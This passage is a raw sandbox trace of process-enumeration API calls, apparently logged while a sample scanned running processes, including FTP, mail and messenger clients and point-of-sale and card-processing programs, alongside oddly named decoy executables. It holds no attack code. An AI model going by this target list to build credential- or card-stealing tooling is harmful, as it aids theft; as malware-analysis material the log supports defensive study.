[0281.134] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.137] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0281.139] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0281.141] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0281.143] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0281.145] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0281.147] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.149] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0281.200] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0281.202] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0281.205] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0281.207] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0281.209] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0281.211] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0281.213] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0281.264] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0281.266] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0281.268] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0281.270] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0281.272] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0281.274] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0281.276] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0281.511] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0281.513] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0281.515] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0281.517] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0281.519] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0281.521] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0281.524] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0281.526] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0281.621] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0281.623] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0281.625] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0281.626] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0281.628] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0281.629] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0281.631] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0281.633] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0281.635] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0281.638] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0281.640] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0281.642] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0281.644] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0281.646] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0281.648] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0281.649] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0281.651] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0281.654] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0281.656] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0281.658] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0281.659] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0281.661] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0281.663] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0281.665] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0281.760] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0281.764] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0281.767] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0281.769] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0281.770] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0281.772] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0281.774] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0281.776] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0281.783] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0281.785] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0281.787] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0281.789] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0281.790] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0281.795] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0281.796] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0281.798] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0281.800] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0281.802] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0281.804] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0281.805] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0281.860] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0281.863] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0281.865] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0281.867] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0281.869] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0281.875] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0281.877] CloseHandle (hObject=0x21f8) returned 1 [0281.877] Sleep (dwMilliseconds=0x64) [0281.988] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0282.004] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.006] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0282.008] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0282.010] Process32Next (in: 